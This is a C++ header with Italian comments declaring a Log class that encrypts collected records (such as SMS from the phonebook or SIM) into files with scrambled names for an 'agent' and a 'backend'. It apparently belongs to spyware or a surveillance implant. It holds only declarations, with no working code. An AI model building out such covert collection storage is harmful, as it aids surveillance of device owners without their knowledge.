#include "Common.h"
#include "Encryption.h"
#include <exception>
using namespace std;

#ifndef __Log_h__
#define __Log_h__

class Log;

class Log
{
	/**
	 * Indica il nome scramblato del file di log sul quale eseguire i vari metodi, va deallocato dal distruttore.
	 */
	private: WCHAR* wEncName;

	/**
	 * Rappresenta il nome in chiaro del file di log, va deallocato dal distruttore.
	 */
	private: WCHAR* wName;

	private: HANDLE hFile;
	private: Encryption *encryptionObj;

	/**
	 * Questa funzione prende i byte puntati da pByte, li cifra e li scrive su un file di Log nuovo,
	 * la lunghezza del buffer puntato da pByte e' data da uLen, Id e' l'id dell'agente, Type il tipo
	 * di log (sms da rubrica, da sim etc...), Seq e' un numero sequenziale che va incrementato dall'agente
	 * per ogni log che vuole creare, uAdditional rappresenta il numero di byte da scrivere nella struttura
	 * dell'header dopo la LogStruct e che puo' contenere dati addizionali utilizzati dal backend. Se
	 * il file gia' esiste Seq viene incrementato fino a trovare un nome libero. La funzione torna TRUE se
	 * la scrittura e' andata a buon fine, FALSE altrimenti. Prima di ogni blocco dati c'e' una DWORD che 
	 * identifica la lunghezza NON paddata del blocco scritto.
	 */
	public: BOOL WriteLog(UINT Id, UINT Type, UINT Seq, BYTE* pByte, UINT uLen, UINT uAdditional);

	/**
	* Questa funzione prende i byte puntati da pByte, li cifra e li scrive su un file di Log gia' presente,
	* la lunghezza del buffer puntato da pByte e' data da uLen, Id e' l'id dell'agente, Type il tipo
	* di log (sms da rubrica, da sim etc...), Seq e' un numero sequenziale che va incrementato dall'agente
	* per ogni log che vuole creare. Se il file identificato dai parametri non esiste, la funzione ritorna,
	* se esiste viene aperto ed i dati vengono appesi. La funzione torna TRUE se la scrittura e' andata a 
	* buon fine, FALSE altrimenti. Prima di ogni blocco dati c'e' una DWORD che identifica la lunghezza NON
	* paddata del blocco scritto.
	*/
	public: BOOL AppendLog(UINT Id, UINT Type, UINT Seq, BYTE* pByte, UINT uLen);

	/**
	 * Effettua la chiusura del log e decrementa il reference counter. Torna TRUE se il file e' stato chiuso con
	 * successo, FALSE se il reference counter e' diverso da 0 oppure la chiusura non e' stata possibile.
	 */
	private: BOOL CloseLog();

	/**
	 * Rimuove un file di log che ha come nome wLogName. Torna TRUE se la rimozione e' andata a buon fine,
	 * FALSE altrimenti.
	 */
	public: BOOL RemoveLog(WCHAR* wLogName);

	/**
	 * Lista tutti i log presenti nella cartella dei log e riempie il vettore. Torna NULL in caso di errore, o se non ci sono
	 * log ed un valore diverso da 0 se la funzione ha trovato dei file. Il vettore ed i relativi membri vanno liberati
	 * dal chiamante.
	 */
	public: list<WCHAR*>* ListLogs();

	Log();
	~Log();
};

#endif
